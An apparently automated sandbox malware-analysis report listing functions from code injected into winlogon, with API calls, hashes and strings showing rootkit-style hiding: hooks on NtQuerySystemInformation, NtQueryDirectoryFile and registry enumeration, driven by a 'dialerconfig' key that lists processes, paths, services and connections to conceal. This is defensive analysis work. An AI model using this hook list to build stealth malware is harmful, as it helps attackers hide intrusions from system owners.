Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000225DC6A7E8C
RtlCaptureContext.NTDLL ref: 00000225DC6A7EB9
RtlLookupFunctionEntry.NTDLL ref: 00000225DC6A7ED3
RtlVirtualUnwind.NTDLL ref: 00000225DC6A7F14
IsDebuggerPresent.KERNEL32 ref: 00000225DC6A7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000225DC6A7F89
UnhandledExceptionFilter.KERNEL32 ref: 00000225DC6A7F94

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 5ec5ec95e36d2b9761df2f19de70415926bf578208c2e4ee6b643ac6d1fcaa5d
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 28313C76304F90A5EB60DFA4E8443DA7361F788749F44842ADA4D47B98EF38C648CB10

Function 00000225DC64B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000225DC64B585
RtlLookupFunctionEntry.NTDLL ref: 00000225DC64B59D
RtlVirtualUnwind.NTDLL ref: 00000225DC64B5D8
IsDebuggerPresent.KERNEL32 ref: 00000225DC64B611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000225DC64B61B
UnhandledExceptionFilter.KERNEL32 ref: 00000225DC64B626

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 31acfc79b5b35cb9e1e8501721361a76cb7a9afdb4b51760c87d5441e5bab70d
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 5E31923A218F90A6DB60CF79E84439E73A4F788B55F504526EB9E43B95DF38C545CB00

Function 00000225DC6AB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000225DC6AB585
RtlLookupFunctionEntry.NTDLL ref: 00000225DC6AB59D
RtlVirtualUnwind.NTDLL ref: 00000225DC6AB5D8
IsDebuggerPresent.KERNEL32 ref: 00000225DC6AB611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000225DC6AB61B
UnhandledExceptionFilter.KERNEL32 ref: 00000225DC6AB626

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 44c8f18018911a0facef0ed95575b6cc75af72e29172093ed9c2daae054a5ba8
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: AD31A43A304F90A6DB60CF69E84439E73A5F788B59F504126EB9D83BA8DF38C545CB00

Function 00000225DC64FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000225DC64FF67
WriteFile.KERNEL32 ref: 00000225DC65021E
WriteFile.KERNEL32 ref: 00000225DC650270
GetLastError.KERNEL32 ref: 00000225DC650372
GetLastError.KERNEL32 ref: 00000225DC6503D2

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: fe454cc261bdb08bb9bf612984af53997641b1df6e52c17f631db44c18d12b1f
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 25E1043A728FA0AAE710CFA8D4882DD7BB1F3457C9F248516DF4A57B99DA34C51AC700

Function 00000225DC6AFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000225DC6AFF67
WriteFile.KERNEL32 ref: 00000225DC6B021E
WriteFile.KERNEL32 ref: 00000225DC6B0270
GetLastError.KERNEL32 ref: 00000225DC6B0372
GetLastError.KERNEL32 ref: 00000225DC6B03D2

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: b035fcf8bd0f82df1f998d612e57b17a4f66fc1ce02ecce0c6057b00589d60e0
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 61E1F37A714FA0AAE710CFA8D4882DD7BB2F74578AF148116DF4E57B99DA38C41AC700

Function 00000225DC64BE3C Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction ID: cd021be3b7f994735f8efe401c0160f1a902b8f3b311327af9ee367ef9e6a18a
Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction Fuzzy Hash: A551FB2A71CFA0A4FB20DBBAE90879E7BA5B784BD5F148154EE5A47F95CB34C141C700

Function 00000225DC6ABE3C Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction ID: 7adad651a12d3839833733cc8669bc6712da98d5366a51697aca83eeb9324270
Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction Fuzzy Hash: A651EB36704FA0A4FB20DBBAA90839E7BE5B785BD5F248215EE5887B95CB35C541C700

Function 00000225DC6214A0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction ID: cc696e65a456b63b99bc5d4aa4762c6fec622c4d598d1fb74e675c82790ada62
Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction Fuzzy Hash: E8F096B57146A49BEBA4CF6CA846B19B7E0F3083C6F80C529D68AC3B04D33C8461DF04

Function 00000225DC6A1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC6A165B
HeapAlloc.KERNEL32 ref: 00000225DC6A166A

Part of subcall function 00000225DC6A1274: GetProcessHeap.KERNEL32 ref: 00000225DC6A127A
Part of subcall function 00000225DC6A1274: HeapAlloc.KERNEL32 ref: 00000225DC6A1289
Part of subcall function 00000225DC6A1274: GetProcessHeap.KERNEL32 ref: 00000225DC6A12A3
Part of subcall function 00000225DC6A1274: HeapAlloc.KERNEL32 ref: 00000225DC6A12B4

RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A16DA
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A1707
RegCloseKey.ADVAPI32 ref: 00000225DC6A1721
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A1741
RegCloseKey.ADVAPI32 ref: 00000225DC6A175C
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A177C
RegCloseKey.ADVAPI32 ref: 00000225DC6A1797
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A17B7
RegCloseKey.ADVAPI32 ref: 00000225DC6A17D2
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A17F2
RegCloseKey.ADVAPI32 ref: 00000225DC6A180D
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A182D
RegCloseKey.ADVAPI32 ref: 00000225DC6A1848
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A1868
RegCloseKey.ADVAPI32 ref: 00000225DC6A1883
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6A18A3
RegCloseKey.ADVAPI32 ref: 00000225DC6A18BE
RegCloseKey.ADVAPI32 ref: 00000225DC6A18C8

Part of subcall function 00000225DC6A12C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000225DC6A1326
Part of subcall function 00000225DC6A12C8: GetProcessHeap.KERNEL32 ref: 00000225DC6A1334
Part of subcall function 00000225DC6A12C8: HeapAlloc.KERNEL32 ref: 00000225DC6A1345
Part of subcall function 00000225DC6A12C8: RegEnumValueW.ADVAPI32 ref: 00000225DC6A13A1
Part of subcall function 00000225DC6A12C8: GetProcessHeap.KERNEL32 ref: 00000225DC6A13E9
Part of subcall function 00000225DC6A12C8: HeapAlloc.KERNEL32 ref: 00000225DC6A13F7
Part of subcall function 00000225DC6A12C8: GetProcessHeap.KERNEL32 ref: 00000225DC6A141B
Part of subcall function 00000225DC6A12C8: HeapFree.KERNEL32 ref: 00000225DC6A1429
Part of subcall function 00000225DC6A12C8: lstrlenW.KERNEL32 ref: 00000225DC6A1432
Part of subcall function 00000225DC6A12C8: GetProcessHeap.KERNEL32 ref: 00000225DC6A1440
Part of subcall function 00000225DC6A12C8: HeapAlloc.KERNEL32 ref: 00000225DC6A144E

Strings

paths, xrefs: 00000225DC6A17B0
service_names, xrefs: 00000225DC6A17EB
tcp_remote, xrefs: 00000225DC6A1861
pid, xrefs: 00000225DC6A173A
process_names, xrefs: 00000225DC6A1775
tcp_local, xrefs: 00000225DC6A1826
udp, xrefs: 00000225DC6A189C
startup, xrefs: 00000225DC6A16FD
SOFTWARE\dialerconfig, xrefs: 00000225DC6A16BA

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: c2b27e60f9833f8a4efb5a46521195ba81d972db8b51ad94bb129a824eb49aba
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: D3711C3A310E64E5EB10DFAAE85869937B5FB84B8AF509121DE4D87B69DF38C445C300

Function 00000225DC6412C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000225DC641326
GetProcessHeap.KERNEL32 ref: 00000225DC641334
HeapAlloc.KERNEL32 ref: 00000225DC641345
RegEnumValueW.ADVAPI32 ref: 00000225DC6413A1

Part of subcall function 00000225DC641554: StrCmpIW.SHLWAPI ref: 00000225DC641585

GetProcessHeap.KERNEL32 ref: 00000225DC6413E9
HeapAlloc.KERNEL32 ref: 00000225DC6413F7
GetProcessHeap.KERNEL32 ref: 00000225DC64141B
HeapFree.KERNEL32 ref: 00000225DC641429
lstrlenW.KERNEL32 ref: 00000225DC641432
GetProcessHeap.KERNEL32 ref: 00000225DC641440
HeapAlloc.KERNEL32 ref: 00000225DC64144E
StrCpyW.SHLWAPI ref: 00000225DC641470
GetProcessHeap.KERNEL32 ref: 00000225DC641485
HeapFree.KERNEL32 ref: 00000225DC641493

Strings

d, xrefs: 00000225DC641365

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: c77c60887f5eec905f9c55c612795a7d8c3603e9356656533834664b1217e901
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 61518EBA218F54A3EB24DFAAE54839AB3A1F788F85F148125DB4A07B14DF38C055C740

Function 00000225DC6A12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000225DC6A1326
GetProcessHeap.KERNEL32 ref: 00000225DC6A1334
HeapAlloc.KERNEL32 ref: 00000225DC6A1345
RegEnumValueW.ADVAPI32 ref: 00000225DC6A13A1

Part of subcall function 00000225DC6A1554: StrCmpIW.SHLWAPI ref: 00000225DC6A1585

GetProcessHeap.KERNEL32 ref: 00000225DC6A13E9
HeapAlloc.KERNEL32 ref: 00000225DC6A13F7
GetProcessHeap.KERNEL32 ref: 00000225DC6A141B
HeapFree.KERNEL32 ref: 00000225DC6A1429
lstrlenW.KERNEL32 ref: 00000225DC6A1432
GetProcessHeap.KERNEL32 ref: 00000225DC6A1440
HeapAlloc.KERNEL32 ref: 00000225DC6A144E
StrCpyW.SHLWAPI ref: 00000225DC6A1470
GetProcessHeap.KERNEL32 ref: 00000225DC6A1485
HeapFree.KERNEL32 ref: 00000225DC6A1493

Strings

d, xrefs: 00000225DC6A1365

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 70b2d72f91b6f18ded63beffd86d0ff829e6467697ea3820cc6d5b1da63263f4
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 8B518DBA604F54E7EB14CFAAE54839AB3A6F788F82F148125DB4A47B14DF38D055CB40

Function 00000225DC641EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000225DC641EBF

Part of subcall function 00000225DC642174: GetModuleHandleA.KERNEL32 ref: 00000225DC64218C
Part of subcall function 00000225DC642174: GetProcAddress.KERNEL32 ref: 00000225DC64219D

Part of subcall function 00000225DC645C10: GetCurrentThreadId.KERNEL32 ref: 00000225DC645C4B

Strings

NtEnumerateValueKey, xrefs: 00000225DC641F76
NtDeviceIoControlFile, xrefs: 00000225DC641FF6
NtEnumerateKey, xrefs: 00000225DC641F59
NtResumeThread, xrefs: 00000225DC641F02
NtQuerySystemInformation, xrefs: 00000225DC641EE5
EnumServicesStatusExW, xrefs: 00000225DC641FB1, 00000225DC641FD2
sechost.dll, xrefs: 00000225DC641FD9
ntdll.dll, xrefs: 00000225DC641ECD
NtQueryDirectoryFile, xrefs: 00000225DC641F1F
NtQueryDirectoryFileEx, xrefs: 00000225DC641F3C
EnumServiceGroupW, xrefs: 00000225DC641F90
advapi32.dll, xrefs: 00000225DC641F97, 00000225DC641FB8

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 197445dab69a72c6b2701a4be11a1dbf2a87165c78cac1134486ad74d2a900e6
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 263197AC128D7AB1EB06EFEDE8596E43321B784746FF0D553E61A031A69E38C249C340

Function 00000225DC6A1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000225DC6A1EBF

Part of subcall function 00000225DC6A2174: GetModuleHandleA.KERNEL32 ref: 00000225DC6A218C
Part of subcall function 00000225DC6A2174: GetProcAddress.KERNEL32 ref: 00000225DC6A219D

Part of subcall function 00000225DC6A5C10: GetCurrentThreadId.KERNEL32 ref: 00000225DC6A5C4B

Strings

EnumServiceGroupW, xrefs: 00000225DC6A1F90
NtQueryDirectoryFile, xrefs: 00000225DC6A1F1F
ntdll.dll, xrefs: 00000225DC6A1ECD
NtQuerySystemInformation, xrefs: 00000225DC6A1EE5
sechost.dll, xrefs: 00000225DC6A1FD9
advapi32.dll, xrefs: 00000225DC6A1F97, 00000225DC6A1FB8
NtDeviceIoControlFile, xrefs: 00000225DC6A1FF6
NtResumeThread, xrefs: 00000225DC6A1F02
NtEnumerateKey, xrefs: 00000225DC6A1F59
NtEnumerateValueKey, xrefs: 00000225DC6A1F76
EnumServicesStatusExW, xrefs: 00000225DC6A1FB1, 00000225DC6A1FD2
NtQueryDirectoryFileEx, xrefs: 00000225DC6A1F3C

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: f2345c7f7979f1a5c9112095c6936f51b981acc03c2bb6a2f92852ef080b524c
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 4A31BB6C290D6AB0FB06EFEDE85D6D42322B744347FE0D413E91E522669F38964DC390

Function 00000225DC6423F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000225DC642405
GetCurrentProcessId.KERNEL32 ref: 00000225DC64240F

Part of subcall function 00000225DC6419AC: OpenProcess.KERNEL32 ref: 00000225DC6419CA
Part of subcall function 00000225DC6419AC: IsWow64Process.KERNEL32 ref: 00000225DC6419E0
Part of subcall function 00000225DC6419AC: CloseHandle.KERNEL32 ref: 00000225DC6419FB

CreateFileW.KERNEL32 ref: 00000225DC642468
WriteFile.KERNEL32 ref: 00000225DC642490
ReadFile.KERNEL32 ref: 00000225DC6424AF
CloseHandle.KERNEL32 ref: 00000225DC6424B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 00000225DC642438
\\.\pipe\dialerchildproc32, xrefs: 00000225DC64243F

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 97d4650460fd1ed870c178f8d23a3eff64fab07327a250838c03ffd6b33ea587
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 8721217A628F50A3F710CB69E54835A77A0F789FA5F608215EA5907BA8DF3CC149CB00

Function 00000225DC6A23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000225DC6A2405
GetCurrentProcessId.KERNEL32 ref: 00000225DC6A240F

Part of subcall function 00000225DC6A19AC: OpenProcess.KERNEL32 ref: 00000225DC6A19CA
Part of subcall function 00000225DC6A19AC: IsWow64Process.KERNEL32 ref: 00000225DC6A19E0
Part of subcall function 00000225DC6A19AC: CloseHandle.KERNEL32 ref: 00000225DC6A19FB

CreateFileW.KERNEL32 ref: 00000225DC6A2468
WriteFile.KERNEL32 ref: 00000225DC6A2490
ReadFile.KERNEL32 ref: 00000225DC6A24AF
CloseHandle.KERNEL32 ref: 00000225DC6A24B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 00000225DC6A2438
\\.\pipe\dialerchildproc32, xrefs: 00000225DC6A243F

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 7f380fac14d76415e31badb251968f92843777bce0a839fde5f99f266927d741
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: BD214F3A718F50A3F710CB69E54835A73A1F789BA6F508215EA5942BA9CF3CC149CB00

Function 00000225DC64104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000225DC6410AB
RegEnumValueW.ADVAPI32 ref: 00000225DC64110E
GetProcessHeap.KERNEL32 ref: 00000225DC641155
HeapAlloc.KERNEL32 ref: 00000225DC641163
GetProcessHeap.KERNEL32 ref: 00000225DC641187
HeapFree.KERNEL32 ref: 00000225DC641195

Strings

d, xrefs: 00000225DC6410CE

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: ca7602a269add0734a0897c8356ebd1df981e37aa2bd2fa69252cf5db3528a0f
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: FB418077218B90E7E7648FA6E44879AB7A1F389B85F008125DB8A07B54DF38D165CB00

Function 00000225DC6A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000225DC6A10AB
RegEnumValueW.ADVAPI32 ref: 00000225DC6A110E
GetProcessHeap.KERNEL32 ref: 00000225DC6A1155
HeapAlloc.KERNEL32 ref: 00000225DC6A1163
GetProcessHeap.KERNEL32 ref: 00000225DC6A1187
HeapFree.KERNEL32 ref: 00000225DC6A1195

Strings

d, xrefs: 00000225DC6A10CE

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 000ac5439b4c2b0402a745fed071cd3e56bcaa970eac8b3becf1ef1e8607b3c3
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: D641A177214F90E7E760CFA6E44839AB7A1F388B8AF108125EB8947B54DF38D564CB00

Function 00000225DC6169F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000225DC616A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000225DC616A6A
_RTC_Initialize.LIBCMT ref: 00000225DC616A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000225DC616ABE
__scrt_release_startup_lock.LIBCMT ref: 00000225DC616AE9

Memory Dump Source

Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 03597595ed45fa0fe2af49a01b95c5b3d39fbf82cb5407b1408a8d0594ee632b
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: A581222D702E71BAFE60ABEE944939967E0EB95783F44C025AF4643792DB38C946C700

Function 00000225DC6769F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000225DC676A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000225DC676A6A
_RTC_Initialize.LIBCMT ref: 00000225DC676A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000225DC676ABE
__scrt_release_startup_lock.LIBCMT ref: 00000225DC676AE9

Memory Dump Source

Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
